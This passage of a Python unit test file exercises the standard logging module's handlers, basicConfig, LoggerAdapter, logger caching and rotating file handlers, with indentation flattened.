def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
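# manager.disable acts as a process-wide threshold: records at or below
# that level are dropped regardless of individual logger levels.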
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
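# basicConfig(force=True) (3.8+) removes and closes any handlers already
# attached to the root logger before reconfiguring, which is why only the
# first 'warn' reached old_string_io above.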
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
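# stacklevel=N (3.8+) makes findCaller() skip N-1 extra stack frames, so
# each increment above attributes the record one call further up the stack.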
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
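# Logger._cache memoises isEnabledFor() results per level; setLevel() and
# logging.disable() invalidate the caches of all loggers, as verified above.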
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# Check that the log file is created, and assume that it was created by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
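# The namer/rotator attributes exercised above are the public
# customisation hooks of the rotating handlers: namer maps the default
# rotated filename to its final name, and rotator performs the actual
# move/compress step (the default simply renames the file).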
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
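# Worked arithmetic for the generated W0 case above (a sketch, not part of
# the original tests): time 0 (the epoch) is a Thursday. The handler first
# rolls forward to the next midnight (24 hours), then waits the 4 further
# days needed to land on the midnight that ends Monday ('W0'), hence
# secs(days=4, hours=24) == 5 * 86400 seconds.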
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
